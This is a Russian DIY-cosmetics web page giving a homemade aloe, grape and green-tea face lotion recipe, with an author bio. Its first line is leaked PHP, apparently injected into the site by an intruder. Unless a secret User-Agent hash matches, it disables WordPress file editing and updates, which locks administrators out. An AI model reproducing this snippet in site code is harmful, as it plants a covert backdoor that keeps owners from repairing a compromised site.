if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Умываемся лосьоном с алоэ, сделанным своими руками! | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Умываемся лосьоном с алоэ, сделанным своими руками!

Приготовленный лосьон для умывания в домашних условиях порадует вас отличным результатом

При­го­тов­лен­ный лосьон для умы­ва­ния в домаш­них усло­ви­ях пора­ду­ет вас отлич­ным результатом.

Для изготовления понадобиться:

  • 1 сред­ний лист алоэ;
  • вино­град (2–3 ягоды);
  • зеле­ный чай (1 ст.л.).

Приготовление

Для при­го­тов­ле­ния необ­хо­ди­мо наре­зать 1 неболь­шой лист алоэ. Лом­ти­ки поре­зан­но­го рас­те­ния необ­хо­ди­мо тща­тель­но пере­ме­шать в блен­де­ре до появ­ле­ния сока. Это мож­но сде­лать вруч­ную при помо­щи тер­ки. Сок алоэ необ­хо­ди­мо отцедить.

Затем необ­хо­ди­мо вино­град­ные ягод­ки осво­бо­дить от косто­чек. Косточ­ки не выбра­сы­вай­те, они могут пона­до­бить­ся для изго­тов­ле­ния дру­го­го сред­ства по ухо­ду за кожей. Ведь такие рецеп­ты очень про­сты и полез­ны. Яго­ды так­же необ­хо­ди­мо отпра­вить в блен­дер и измель­чить до обра­зо­ва­ния каши­цы. После про­де­лан­ный про­це­дур, необ­хо­ди­мо тща­тель­но сме­шать вино­град­ную мякоть, сок алоэ и зеле­ный чай.

Применение

Этой сме­сью нуж­но умы­вать лицо по утрам и вече­рам. Поверь­те, резуль­тат вас обрадует.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!